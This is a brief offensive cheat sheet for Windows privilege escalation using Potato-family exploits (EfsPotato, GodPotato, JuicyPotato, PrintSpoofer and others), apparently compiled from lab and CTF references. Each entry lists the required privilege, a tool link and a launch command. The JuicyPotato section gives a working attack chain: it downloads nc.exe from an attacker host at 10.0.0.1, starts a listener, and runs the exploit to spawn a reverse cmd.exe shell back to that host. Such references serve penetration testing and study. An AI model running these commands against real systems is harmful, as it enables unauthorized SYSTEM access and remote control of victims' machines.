LocalPotato

EfsPotato

Required Privilege

• SeImpersonatePrivilege

Payloads

• https://github.com/zcgonvh/EfsPotato

EfsPotato "cmd.exe /c whoami"

GodPotato

Required Privileges

• SeImpersonatePrivilege

Payloads

• https://github.com/BeichenDream/GodPotato

GodPotato -cmd "cmd /c whoami"

JuicyPotato

Required Privilege

• SeImpersonatePrivilege or SeAssignPrimaryToken

Payloads

• https://github.com/antonioCoco/JuicyPotatoNG

• https://github.com/ohpe/juicy-potato

Before exploiting, we need to upload nc.exe (it is available from here) to the target machine.

Invoke-WebRequest -Uri http://10.0.0.1:8000/nc.exe -OutFile c:\Temp\nc.exe

Next start a listener in local machine.

nc -lvnp 4444

Then execute JuicyPotato in target machine.

JuicyPotatoNG.exe -t * -p "c:\Temp\nc.exe" -a "10.0.0.1 4444 -e cmd.exe"

PrintSpoofer

Required Privilege

• SeImpersonatePrivilege

Payloads

• https://github.com/dievus/printspoofer

PrintSpoofer.exe -i -c cmd

RoguePotato

Required Privilege

• SeImpersonatePrivilege

Payloads

• https://github.com/antonioCoco/RoguePotato

RottenPotato

Required Privilege

• SeImpersonatePrivilege

Payloads

• https://github.com/breenmachine/RottenPotatoNG

References

• jlajara

• decoder-it

• LocalPotato

• TryHackMe

• HackTricks

• FoxGlove Security